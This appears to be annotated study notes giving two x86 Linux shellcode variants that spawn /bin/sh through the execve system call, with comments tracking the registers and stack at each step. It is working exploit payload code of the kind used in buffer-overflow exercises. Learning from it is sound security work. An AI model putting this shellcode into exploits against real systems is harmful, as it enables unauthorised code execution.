push 0x00000068
push 0x732f2f2f
push 0x6e69622f
mov ebx, esp   # ebx -> /bin///sh\x00\x00\x00  (12 bytes)
push 0x1010101 esp->0x1010101
xor dword ptr [esp], 0x1016972 # esp -> 0x6873 -> sh\x00\x00
xor ecx, ecx  # ecx = 0
push ecx # esp -> 0
push 4 # esp -> 4
pop ecx # ecx = 4 esp-> 0
add ecx, esp # ecx -> sh\x00\x00
push ecx # esp-> ->(sh\x00\x00)
mov ecx, esp # ecx = -> -> sh\x00\x00
xor edx, edx # edx = 0
push SYS_execve # esp -> SYS_execve
pop eax # eax = SYS_execve = \xb
int 0x80

xor    eax,eax # eax = 0
push   eax # esp -> 0
push   0x68732f2f
push   0x6e69622f
mov    ebx,esp # ebx-> /bin//sh\x00x00x00x00 (12 bytes)
push   eax # esp -> 0
push   ebx # esp -> /bin//sh\x00x00x00x00
mov    ecx,esp # ecx -> -> /bin//sh\x00x00x00x00
mov    al,0xb
int    0x80